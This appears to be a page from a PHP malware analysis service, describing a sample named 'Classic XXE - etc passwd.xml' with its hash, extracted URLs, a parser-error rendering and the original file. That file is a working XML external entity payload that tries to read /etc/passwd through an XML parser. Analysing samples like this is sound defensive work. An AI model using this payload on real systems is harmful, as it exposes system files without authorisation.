Classic XXE - etc passwd.xml

md5: 45cfd8c1ce622ef7cc7fe463a3c00622

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
URLs
file:///etc/passwd (Original)
http://www.w3.org/1999/xhtml (HTML)

Deobfuscated PHP code
Failed to deobfuscate code
Execution traces
Generated HTML code
<html xmlns="http://www.w3.org/1999/xhtml"><body><parsererror style="display: block; white-space: pre; border: 2px solid #c77; padding: 0 1em 0 1em; margin: 1em; background-color: #fdd; color: black"><h3>This page contains the following errors:</h3><div style="font-family:monospace;font-size:12px">error on line 3 at column 17: ContentDecl : Name or '(' expected
</div><h3>Below is a rendering of the page up to the first error.</h3></parsererror></body></html>
Original PHP code
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>

PHP Malware Analysis

Classic XXE - etc passwd.xml

md5: 45cfd8c1ce622ef7cc7fe463a3c00622

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code